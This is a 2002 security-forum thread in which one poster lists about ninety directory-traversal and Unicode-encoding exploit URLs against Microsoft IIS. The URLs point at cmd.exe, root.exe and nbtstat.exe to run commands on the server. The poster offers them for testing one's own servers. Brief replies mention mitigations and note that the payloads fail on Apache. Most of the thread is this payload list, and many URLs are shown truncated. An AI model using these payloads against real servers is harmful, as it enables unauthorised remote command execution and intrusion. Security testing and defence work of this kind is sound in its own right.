Results 1 to 4 of 4

Thread: 101 traversal Xploits

  1. June 22nd, 2002, 04:20 PM #1
    ntsa
    ntsa is offline
    Senior Member
    Join Date
    Apr 2002
    Posts
    324

    Arrow 101 traversal Xploits

    I get scanned by people looking for directory traversal explots all the time and I have an SQL filter set up that allow me to keep track of these suspect requests.

    The problem is that such a vulnerablility scanner is very simple to make (see my tutorial on Scripting Internet Connections Under Window$ for more information). If you are worried about this sort of intrusion (and you use IIS) see my tutorial entitled Securing an installation of IIS 4. (No, seriously) .

    I almost wrote a tutorial using the TCPUtil code documented in the 'Scripting connections' article to show how such a vulnerability scanner could be written, but decided against it - anyone who can't figure it out from that article...well I'm not going to draw the skiddies a picture.

    I am providing these traversal exploits here so that you can test them against _YOUR_OWN_ servers (note the IP address), and I do have a future tutorial planned on how to create your own simple IDS for web based services (with the SQL filter I described above) when I get a minute. Watch this space.

    So - the traversals...

    http://127.0.0.1/..%2e..%2ewinnt/sys...cmd.exe?/c+dir
    http://127.0.0.1/..%5c..%5cwinnt/sys...cmd.exe?/c+dir
    http://127.0.0.1/_mem_bin/..%5c../.....cmd.exe?/c+dir
    http://127.0.0.1/_vti_bin/..%5c..%5c...cmd.exe?/c+dir
    http://127.0.0.1/_vti_bin/..%5c..%5c...nbtstat.exe?-s
    http://127.0.0.1/_vti_bin/..%5c..%5c...cmd.exe?/c+dir
    http://127.0.0.1/_vti_bin/..%5c../.....cmd.exe?/c+dir
    http://127.0.0.1/_vti_bin/..À%qf../...cmd.exe?/c+dir
    http://127.0.0.1/_vti_cnf/..%5c..%5c...cmd.exe?/c+dir
    http://127.0.0.1/_vti_cnf/..%5c..%5c...cmd.exe?/c+dir
    http://127.0.0.1/_vti_log/..%5c..%5c...cmd.exe?/c+dir
    http://127.0.0.1/adsamples/..%5c..%5...cmd.exe?/c+dir
    http://127.0.0.1/adsamples/..%5c..%5...cmd.exe?/c+dir
    http://127.0.0.1/adsamples/..%5c..%5...cmd.exe?/c+dir
    http://127.0.0.1/adsamples/cmd1.exe?/c+dir
    http://127.0.0.1/adsamples/root.exe?/c+dir
    http://127.0.0.1/c/winnt/system32/cmd.exe?/c+dir
    http://127.0.0.1/cgi-bin/..%5c..%5c....cmd.exe?/c+dir
    http://127.0.0.1/cgi-bin/..%5c..%5c....cmd.exe?/c+dir
    http://127.0.0.1/cgi-bin/..%5c../..%...nbtstat.exe?-s
    http://127.0.0.1/cgi-bin/cmd1.exe?/c+dir
    http://127.0.0.1/cgi-bin/root.exe?/c+dir
    http://127.0.0.1/cmd1.exe?/c+dir
    http://127.0.0.1/d/winnt/system32/cmd.exe?/c+dir
    http://127.0.0.1/iisadmpwd/..%2f..%2...cmd.exe?/c+dir
    http://127.0.0.1/iisadmpwd/..%2f..%2...nbtstat.exe?-s
    http://127.0.0.1/iisadmpwd/..%5c..%5...cmd.exe?/c+dir
    http://127.0.0.1/iisadmpwd/..%5c..%5...nbtstat.exe?-s
    http://127.0.0.1/iisadmpwd/..%5c../....cmd.exe?/c+dir
    http://127.0.0.1/iisadmpwd/..Á%pc.....cmd.exe?/c+dir
    http://127.0.0.1/iisadmpwd/cmd1.exe?/c+dir
    http://127.0.0.1/iisadmpwd/root.exe?/c+dir
    http://127.0.0.1/iissamples/cmd1.exe?/c+dir
    http://127.0.0.1/iissamples/root.exe?/c+dir
    http://127.0.0.1/images/cmd1.exe?/c+dir
    http://127.0.0.1/images/root.exe?/c+dir
    http://127.0.0.1/msadc/..%2e..%2ewin...cmd.exe?/c+dir
    http://127.0.0.1/msadc/..%5c..%5c..%...cmd.exe?/c+dir
    http://127.0.0.1/msadc/..%5c..%5c..%...nbtstat.exe?-s
    http://127.0.0.1/msadc/..%5c../..%5c...cmd.exe?/c+dir
    http://127.0.0.1/msadc/..%5c../..%5c...cmd.exe?/c+dir
    http://127.0.0.1/msadc/..Á%pc../.....cmd.exe?/c+dir
    http://127.0.0.1/msadc/cmd1.exe?/c+dir
    http://127.0.0.1/MSADC/root.exe?/c+dir
    http://127.0.0.1/PBServer/..%5c..%5c...cmd.exe?/c+dir
    http://127.0.0.1/PBServer/..%5c..%5c...nbtstat.exe?-s
    http://127.0.0.1/root.exe?/c+dir
    http://127.0.0.1/Rpc/..%5c..%5c..%5c...cmd.exe?/c+dir
    http://127.0.0.1/Rpc/..%5c..%5c..%5c...nbtstat.exe?-s
    http://127.0.0.1/samples/..%5c..%5c....cmd.exe?/c+dir
    http://127.0.0.1/samples/..%5c..%5c....cmd.exe?/c+dir
    http://127.0.0.1/samples/cmd1.exe?/c+dir
    http://127.0.0.1/samples/root.exe?/c+dir
    http://127.0.0.1/scripts/.%2e/.%2e/w...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%2e..%2ew...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%2f..%2f....cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%2f..%2fw...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%2f../win...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%5c%5c../...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%5c..%5c....cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%5c..%5cw...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%5c..%5cw...nbtstat.exe?-s
    http://127.0.0.1/scripts/..%5c../..%...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%5c../win...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..Á../.....cmd.exe?/c+dir
    http://127.0.0.1/scripts/..Á../win...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..Á..Á....cmd.exe?/c+dir
    http://127.0.0.1/scripts/..Á%8s../....cmd.exe?/c+dir
    http://127.0.0.1/scripts/..Á%8s../w...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..À%9v../....cmd.exe?/c+dir
    http://127.0.0.1/scripts/..À%9v../w...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..Á%pc../....cmd.exe?/c+dir
    http://127.0.0.1/scripts/..Á%pc../w...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..À%qf../....cmd.exe?/c+dir
    http://127.0.0.1/scripts/..À%qf../w...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..o../..o.....cmd.exe?/c+dir
    http://127.0.0.1/scripts/..o../winnt...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..ø€€...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..ø€€...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..ü€€...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..ü€€...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..ð€€...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..ð€€...cmd.exe?/c+dir
    http://127.0.0.1/scripts/cmd1.exe?/c+dir
    http://127.0.0.1/scripts/root.exe?/c+dir
    http://127.0.0.1/scripts/shell.exe?/c+dir
    http://127.0.0.1/scripts/winnt/system32/cmd.exe?/c+dir
    http://127.0.0.1/winnt/system32/cmd.exe?/c+dir
    http://127.0.0.1/winnt/system32/nbtstat.exe?-s
    http://127.0.0.1/wwwroot/cmd1.exe?/c+dir
    http://127.0.0.1/wwwroot/root.exe?/c+dir
    \"I may not agree with what you say, but I will defend to the death your right to say it.\"
    Sir Winston Churchill.
    Reply With Quote Reply With Quote
  2. June 22nd, 2002, 04:24 PM #2
    ntsa
    ntsa is offline
    Senior Member
    Join Date
    Apr 2002
    Posts
    324
    Oh and btw - the simplest way to avoid this sort of exploit is to have all your sites hosted on a seperate hard drive to your O/S.

    You can also nulify the effect of someone scanning an IP range by making your default site (W3SVC1) resticted to 127.0.0.1 so someone scanning by IP will always get 403 - unauthorised.
    \"I may not agree with what you say, but I will defend to the death your right to say it.\"
    Sir Winston Churchill.
    Reply With Quote Reply With Quote
  3. June 22nd, 2002, 06:47 PM #3
    jethro
    jethro is offline
    Senior Member
    Join Date
    Nov 2001
    Location
    Ireland
    Posts
    734
    None of these worked on my server, because each link is either OS NT or HTTP IIS. Whereas I am using RedHat with an Apache server. fl00t!
    Reply With Quote Reply With Quote
  4. June 22nd, 2002, 10:28 PM #4
    ntsa
    ntsa is offline
    Senior Member
    Join Date
    Apr 2002
    Posts
    324
    Yes - that's another good way to be secure... Pick a secure O/S...
    \"I may not agree with what you say, but I will defend to the death your right to say it.\"
    Sir Winston Churchill.
    Reply With Quote Reply With Quote
« Previous Thread | Next Thread »

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules